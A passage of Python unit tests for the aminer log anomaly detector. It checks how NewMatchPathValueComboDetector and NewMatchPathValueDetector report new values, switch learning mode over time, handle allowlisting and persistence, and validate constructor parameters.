class NewMatchPathValueComboDetectorTest(TestBase):
    """
    Unittests for the NewMatchPathValueComboDetector.

    The detector under test reports every previously unseen combination of values found at a fixed list of
    parser paths (here "/seq/s1" and "/seq/d1"). The fixtures below build three parse results that the tests
    feed in as log atoms: a complete combination, a second complete combination, and one where the "d1" value
    is missing so that the allow_missing_values_flag behaviour can be exercised.

    Note: the sub-tests mutate shared state (atom_time of the log atoms, the captured output stream, the
    persistence file), so the order of statements inside each test is significant.
    """

    # Fixture 1: " pid=" followed by "25537" -> combination (b" pid=", b"25537") at /seq/s1, /seq/d1.
    match_context = DummyMatchContext(b" pid=25537 uid=2")
    fdme1 = DummyFixedDataModelElement("s1", b" pid=")
    fdme2 = DummyFixedDataModelElement("d1", b"25537")
    seq1 = DummySequenceModelElement("seq", [fdme1, fdme2])
    match_element1 = seq1.get_match_element("", match_context)
    # Fixture 2: "ddd " followed by "25538" -> combination (b"ddd ", b"25538").
    match_context = DummyMatchContext(b"ddd 25538ddd ")
    fdme3 = DummyFixedDataModelElement("s1", b"ddd ")
    fdme4 = DummyFixedDataModelElement("d1", b"25538")
    seq2 = DummySequenceModelElement("seq", [fdme3, fdme4])
    match_element2 = seq2.get_match_element("", match_context)
    # Fixture 3: only the "s1" element matched under the "/seq" prefix, so the "/seq/d1" value is absent.
    # test1receive_atom expects this to be reported as (b'ddd ', None) once missing values are allowed.
    match_element3 = fdme3.get_match_element("/seq", match_context)
    # Fixture 4: the "d1" element is optional and its data (b"25539") does not occur in the input, so the
    # resulting match again lacks a value for the second path (see test4persistence).
    match_context = DummyMatchContext(b"ddd 25538ddd ")
    fdme5 = DummyFixedDataModelElement("s1", b"ddd ")
    fdme6 = OptionalMatchModelElement("o", DummyFixedDataModelElement("d1", b"25539"))
    seq3 = DummySequenceModelElement("seq", [fdme5, fdme6])
    match_element4 = seq3.get_match_element("", match_context)
    match_element5 = fdme5.get_match_element("/seq", match_context)

    def test1receive_atom(self):
        """
        Test that log atoms are processed correctly: new combinations are reported once while learning
        (learn_mode=True) and reported on every occurrence when not learning (learn_mode=False).
        Also test that stop_learning_time and stop_learning_no_anomaly_time switch learn_mode off at the
        expected atom timestamps.
        """
        expected_string = '%s New value combination(s) detected\n%s: "None" (%d lines)\n %s\n\n'
        datetime_format_string = "%Y-%m-%d %H:%M:%S"
        # learn_mode = True
        nmpvcd = NewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False)
        t = round(time.time(), 3)
        log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, nmpvcd)
        log_atom2 = LogAtom(self.match_element2.match_string, ParserMatch(self.match_element2), t, nmpvcd)
        log_atom3 = LogAtom(self.match_element3.match_string, ParserMatch(self.match_element3), t, nmpvcd)
        # First occurrence of a combination is reported.
        self.assertTrue(nmpvcd.receive_atom(log_atom1))
        self.assertEqual(self.output_stream.getvalue(), expected_string % (
            datetime.fromtimestamp(t).strftime(datetime_format_string), nmpvcd.__class__.__name__, 1, "(b' pid=', b'25537')"))
        self.reset_output_stream()
        # repeating should NOT produce the same result: the combination was learned, so no second report.
        self.assertTrue(nmpvcd.receive_atom(log_atom1))
        self.assertEqual(self.output_stream.getvalue(), "")
        self.reset_output_stream()
        # learn_mode = False
        nmpvcd.learn_mode = False
        self.assertTrue(nmpvcd.receive_atom(log_atom2))
        self.assertEqual(self.output_stream.getvalue(), expected_string % (
            datetime.fromtimestamp(t).strftime(datetime_format_string), nmpvcd.__class__.__name__, 1, "(b'ddd ', b'25538')"))
        self.reset_output_stream()
        # repeating should produce the same result: without learning the unknown combination is not stored,
        # so every occurrence is reported again.
        self.assertTrue(nmpvcd.receive_atom(log_atom2))
        self.assertEqual(self.output_stream.getvalue(), expected_string % (
            datetime.fromtimestamp(t).strftime(datetime_format_string), nmpvcd.__class__.__name__, 1, "(b'ddd ', b'25538')"))
        self.reset_output_stream()
        # allow_missing_values_flag=True: an atom lacking the "/seq/d1" value is reported with None in that slot.
        nmpvcd.allow_missing_values_flag = True
        self.assertTrue(nmpvcd.receive_atom(log_atom3))
        self.assertEqual(self.output_stream.getvalue(), expected_string % (
            datetime.fromtimestamp(t).strftime(datetime_format_string), nmpvcd.__class__.__name__, 1, "(b'ddd ', None)"))
        # stop_learning_time: learning ends once an atom is more than 100 s past the first one.
        nmpvcd = NewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False, stop_learning_time=100)
        self.assertTrue(nmpvcd.receive_atom(log_atom1))
        log_atom1.atom_time = t + 99
        self.assertTrue(nmpvcd.receive_atom(log_atom1))
        self.assertTrue(nmpvcd.learn_mode)
        log_atom1.atom_time = t + 101
        self.assertTrue(nmpvcd.receive_atom(log_atom1))
        self.assertFalse(nmpvcd.learn_mode)
        # stop_learning_no_anomaly_time: the window is measured from the last anomaly. log_atom2 at t + 100 is a
        # new combination for this fresh detector, so learning continues at t + 200 and stops after t + 201.
        nmpvcd = NewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False, stop_learning_no_anomaly_time=100)
        log_atom1.atom_time = t
        self.assertTrue(nmpvcd.receive_atom(log_atom1))
        log_atom1.atom_time = t + 100
        self.assertTrue(nmpvcd.receive_atom(log_atom1))
        self.assertTrue(nmpvcd.learn_mode)
        log_atom2.atom_time = t + 100
        self.assertTrue(nmpvcd.receive_atom(log_atom2))
        self.assertTrue(nmpvcd.learn_mode)
        log_atom1.atom_time = t + 200
        self.assertTrue(nmpvcd.receive_atom(log_atom1))
        self.assertTrue(nmpvcd.learn_mode)
        log_atom1.atom_time = t + 201
        self.assertTrue(nmpvcd.receive_atom(log_atom1))
        self.assertFalse(nmpvcd.learn_mode)

    def test2do_timer(self):
        """
        Test if the do_timer method is implemented properly.

        do_timer is expected to return the seconds remaining until next_persist_time and, once that time is
        reached, to return DEFAULT_PERSISTENCE_PERIOD. The t + 999 -> 1 and t + 1000 -> DEFAULT_PERSISTENCE_PERIOD
        expectations only hold if the period advances next_persist_time from t + 400 to t + 1000, i.e. they
        assume DEFAULT_PERSISTENCE_PERIOD == 600.
        """
        nmpvcd = NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False)
        t = time.time()
        nmpvcd.next_persist_time = t + 400
        self.assertEqual(nmpvcd.do_timer(t + 200), 200)
        self.assertEqual(nmpvcd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD)
        self.assertEqual(nmpvcd.do_timer(t + 999), 1)
        self.assertEqual(nmpvcd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD)

    def test3allowlist_event(self):
        """
        Test if the allowlist_event method is implemented properly.

        Allowlisting adds a value tuple to known_values_set directly, bypassing learn_mode. Events for another
        detector class and calls with allowlisting data must be rejected, and a tuple containing None is only
        accepted once allow_missing_values_flag is set.
        """
        # This test case checks whether an exception is thrown when entering an event of another class.
        nmpvcd = NewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False)
        t = round(time.time(), 3)
        analysis = "Analysis.%s"
        value = b"value"
        value2 = b"value2"
        log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, nmpvcd)
        nmpvcd.receive_atom(log_atom1)
        self.assertRaises(Exception, nmpvcd.allowlist_event, analysis % "NewMatchPathDetector", self.output_stream.getvalue(), None)
        # The NewMatchPathValueComboDetector can not handle allowlisting data and therefore an exception is expected.
        self.assertRaises(Exception, nmpvcd.allowlist_event, analysis % nmpvcd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"])
        # This test case checks in which cases an event is triggered and compares with expected results.
        self.assertEqual(nmpvcd.allowlist_event(analysis % nmpvcd.__class__.__name__, (value, value2), None), "Allowlisted path(s) %s with %s." % ("/seq/s1, /seq/d1", (value, value2)))
        self.assertEqual(nmpvcd.known_values_set, {(b" pid=", b"25537"), (value, value2)})
        # A None entry is a TypeError while missing values are disallowed.
        self.assertRaises(TypeError, nmpvcd.allowlist_event, analysis % nmpvcd.__class__.__name__, (value, None), None)
        # allow_missing_values_flag = True
        nmpvcd.allow_missing_values_flag = True
        self.assertEqual(nmpvcd.allowlist_event(analysis % nmpvcd.__class__.__name__, (value, None), None), "Allowlisted path(s) %s with %s." % ("/seq/s1, /seq/d1", (value, None)))
        self.assertEqual(nmpvcd.known_values_set, {(b" pid=", b"25537"), (value, value2), (value, None)})

    def test4persistence(self):
        """
        Test the do_persist and load_persistence_data methods.

        Checks the on-disk JSON form (byte values are stored with a "bytes:" prefix, a missing value as null),
        that a cleared known_values_set is restored from the file, and that a second detector instance created
        with the default persistence_id loads the same set.
        """
        nmpvcd = NewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False)
        t = round(time.time(), 3)
        log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, nmpvcd)
        log_atom2 = LogAtom(self.match_element2.match_string, ParserMatch(self.match_element2), t, nmpvcd)
        log_atom3 = LogAtom(self.match_element4.match_string, ParserMatch(self.match_element4), t, nmpvcd)
        self.assertTrue(nmpvcd.receive_atom(log_atom1))
        self.assertTrue(nmpvcd.receive_atom(log_atom2))
        # Without allow_missing_values_flag an atom lacking one target path is not handled and not learned.
        self.assertFalse(nmpvcd.receive_atom(log_atom3))
        self.assertEqual(nmpvcd.known_values_set, {(b"ddd ", b"25538"), (b" pid=", b"25537")})
        nmpvcd.do_persist()
        with open(nmpvcd.persistence_file_name, "r") as f:
            self.assertEqual(f.read(), '[["bytes: pid=", "bytes:25537"], ["bytes:ddd ", "bytes:25538"]]')
        nmpvcd.known_values_set = set()
        nmpvcd.load_persistence_data()
        self.assertEqual(nmpvcd.known_values_set, {(b"ddd ", b"25538"), (b" pid=", b"25537")})
        # NOTE(review): match_element1.path / match_element2.path are presumably the "/seq" roots rather than the
        # leaf paths; the comparison only checks that the persisted set is loaded, not the target paths.
        other = NewMatchPathValueComboDetector(self.aminer_config, [self.match_element1.path, self.match_element2.path], [self.stream_printer_event_handler])
        self.assertEqual(nmpvcd.known_values_set, other.known_values_set)
        # Same round trip with allow_missing_values_flag=True, so the (b"ddd ", None) combination is persisted too.
        nmpvcd = NewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False, allow_missing_values_flag=True)
        self.assertTrue(nmpvcd.receive_atom(log_atom1))
        self.assertTrue(nmpvcd.receive_atom(log_atom2))
        self.assertTrue(nmpvcd.receive_atom(log_atom3))
        self.assertEqual(nmpvcd.known_values_set, {(b"ddd ", b"25538"), (b" pid=", b"25537"), (b"ddd ", None)})
        nmpvcd.known_values_set = {(b"ddd ", b"25538"), (b" pid=", b"25537"), (b"ddd ", None)}
        nmpvcd.do_persist()
        with open(nmpvcd.persistence_file_name, "r") as f:
            self.assertEqual(f.read(), '[["bytes: pid=", "bytes:25537"], ["bytes:ddd ", null], ["bytes:ddd ", "bytes:25538"]]')
        nmpvcd.known_values_set = set()
        nmpvcd.load_persistence_data()
        self.assertEqual(nmpvcd.known_values_set, {(b"ddd ", b"25538"), (b" pid=", b"25537"), (b"ddd ", None)})
        other = NewMatchPathValueComboDetector(self.aminer_config, [self.match_element1.path, self.match_element2.path], [self.stream_printer_event_handler])
        self.assertEqual(nmpvcd.known_values_set, other.known_values_set)

    def test5validate_parameters(self):
        """
        Test all initialization parameters for the detector. Input parameters must be validated in the class.

        For each constructor argument the wrong types must raise TypeError and semantically invalid values of the
        right type must raise ValueError; one valid value per argument must be accepted. Validating configuration
        at construction time keeps a misconfigured detector from silently running with defaults.
        """
        # target_path_list: must be a non-empty list of non-empty strings.
        self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, [""], [self.stream_printer_event_handler])
        self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, [], [self.stream_printer_event_handler])
        self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, None, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, "", [self.stream_printer_event_handler])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, b"Default", [self.stream_printer_event_handler])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, True, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, 123, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, 123.3, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, {"id": "Default"}, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, (), [self.stream_printer_event_handler])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, set(), [self.stream_printer_event_handler])
        # anomaly_event_handlers: must be a list of event handler objects.
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], ["default"])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], None)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], "")
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], b"Default")
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], True)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], 123)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], 123.3)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], {"id": "Default"})
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], ())
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], set())
        # persistence_id: non-empty str.
        self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id="")
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=None)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=b"Default")
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=True)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=123)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=123.22)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id={"id": "Default"})
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=["Default"])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=[])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=())
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=set())
        NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id="Default")
        # allow_missing_values_flag: bool.
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=b"True")
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag="True")
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=123)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=123.22)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag={"id": "Default"})
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=["Default"])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=[])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=())
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=set())
        NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=True)
        # learn_mode: bool.
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=b"True")
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode="True")
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=123)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=123.22)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode={"id": "Default"})
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=["Default"])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=[])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=())
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=set())
        NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True)
        # output_logline: bool (None is rejected here, unlike learn_mode above).
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=None)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=b"True")
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline="True")
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=123)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=123.22)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline={"id": "Default"})
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=["Default"])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=[])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=())
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=set())
        NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=True)
        # stop_learning_time: positive int or float.
        self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=-1)
        self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=0)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=b"Default")
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time="123")
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time={"id": "Default"})
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=["Default"])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=[])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=())
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=set())
        NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100)
        NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100.22)
        # stop_learning_no_anomaly_time: positive int or float.
        self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=-1)
        self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=0)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=b"Default")
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time="123")
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"})
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=["Default"])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=[])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=())
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=set())
        NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100)
        NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100.22)
        # The two stop criteria are mutually exclusive.
        self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100)
        # log_resource_ignore_list: list of resource URIs; a bare filesystem path is rejected, "file://..." is accepted.
        self.assertRaises(ValueError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"])
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list="")
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=b"Default")
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=True)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=123)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=123.22)
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"})
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=())
        self.assertRaises(TypeError, NewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=set())
        NewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"])


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/NewMatchPathValueDetectorTest.py000066400000000000000000000512101500476301700320260ustar00rootroot00000000000000
import unittest
from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement
import time
from datetime import datetime
from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD


class NewMatchPathValueDetectorTest(TestBase):
    """Unittests for the NewMatchPathValueDetector."""

    match_context1 = DummyMatchContext(b" pid=")
    fdme1 = DummyFixedDataModelElement("s1", b" pid=")
    match_element1 =
fdme1.get_match_element("", match_context1)
    # Second fixture: a single "d1" value (b"25537") at path "/d1".
    match_context2 = DummyMatchContext(b"25537 uid=2")
    fdme2 = DummyFixedDataModelElement("d1", b"25537")
    match_element2 = fdme2.get_match_element("", match_context2)

    def test1receive_atom(self):
        """
        Test that log atoms are processed correctly: a new value is reported once while learning
        (learn_mode=True) and on every occurrence when not learning (learn_mode=False).
        Also test that stop_learning_time and stop_learning_no_anomaly_time switch learn_mode off at the
        expected atom timestamps.
        """
        expected_string = '%s New value(s) detected\n%s: "None" (%d lines)\n %s\n\n'
        datetime_format_string = "%Y-%m-%d %H:%M:%S"
        # learn_mode = True
        nmpvd = NewMatchPathValueDetector(self.aminer_config, [self.match_element1.path, self.match_element2.path], [self.stream_printer_event_handler], learn_mode=True, output_logline=False)
        t = round(time.time(), 3)
        log_atom1 = LogAtom(self.fdme1.data, ParserMatch(self.match_element1), t, nmpvd)
        log_atom2 = LogAtom(self.match_context2.match_data, ParserMatch(self.match_element2), t, nmpvd)
        # First occurrence of a value is reported.
        self.assertTrue(nmpvd.receive_atom(log_atom1))
        self.assertEqual(self.output_stream.getvalue(), expected_string % (
            datetime.fromtimestamp(t).strftime(datetime_format_string), nmpvd.__class__.__name__, 1, "{'/s1': ' pid='}"))
        self.reset_output_stream()
        # repeating should NOT produce the same result: the value was learned, so no second report.
        self.assertTrue(nmpvd.receive_atom(log_atom1))
        self.assertEqual(self.output_stream.getvalue(), "")
        self.reset_output_stream()
        # learn_mode = False
        nmpvd.learn_mode = False
        self.assertTrue(nmpvd.receive_atom(log_atom2))
        self.assertEqual(self.output_stream.getvalue(), expected_string % (
            datetime.fromtimestamp(t).strftime(datetime_format_string), nmpvd.__class__.__name__, 1, "{'/d1': '25537'}"))
        self.reset_output_stream()
        # repeating should produce the same result: without learning the unknown value is not stored,
        # so every occurrence is reported again.
        self.assertTrue(nmpvd.receive_atom(log_atom2))
        self.assertEqual(self.output_stream.getvalue(), expected_string % (
            datetime.fromtimestamp(t).strftime(datetime_format_string), nmpvd.__class__.__name__, 1, "{'/d1': '25537'}"))
        # stop_learning_time: learning ends once an atom is more than 100 s past the first one.
        nmpvd = NewMatchPathValueDetector(self.aminer_config, [self.match_element1.path, self.match_element2.path], [self.stream_printer_event_handler], learn_mode=True, output_logline=False, stop_learning_time=100)
        self.assertTrue(nmpvd.receive_atom(log_atom1))
        log_atom1.atom_time = t + 99
        self.assertTrue(nmpvd.receive_atom(log_atom1))
        self.assertTrue(nmpvd.learn_mode)
        log_atom1.atom_time = t + 101
        self.assertTrue(nmpvd.receive_atom(log_atom1))
        self.assertFalse(nmpvd.learn_mode)
        # stop_learning_no_anomaly_time: the window is measured from the last anomaly. log_atom2 at t + 100 is a
        # new value for this fresh detector, so learning continues at t + 200 and stops after t + 201.
        nmpvd = NewMatchPathValueDetector(self.aminer_config, [self.match_element1.path, self.match_element2.path], [self.stream_printer_event_handler], learn_mode=True, output_logline=False, stop_learning_no_anomaly_time=100)
        log_atom1.atom_time = t
        self.assertTrue(nmpvd.receive_atom(log_atom1))
        log_atom1.atom_time = t + 100
        self.assertTrue(nmpvd.receive_atom(log_atom1))
        self.assertTrue(nmpvd.learn_mode)
        log_atom2.atom_time = t + 100
        self.assertTrue(nmpvd.receive_atom(log_atom2))
        self.assertTrue(nmpvd.learn_mode)
        log_atom1.atom_time = t + 200
        self.assertTrue(nmpvd.receive_atom(log_atom1))
        self.assertTrue(nmpvd.learn_mode)
        log_atom1.atom_time = t + 201
        self.assertTrue(nmpvd.receive_atom(log_atom1))
        self.assertFalse(nmpvd.learn_mode)

    def test2do_timer(self):
        """
        Test if the do_timer method is implemented properly.

        do_timer is expected to return the seconds remaining until next_persist_time and, once that time is
        reached, to return DEFAULT_PERSISTENCE_PERIOD. The t + 999 -> 1 and t + 1000 -> DEFAULT_PERSISTENCE_PERIOD
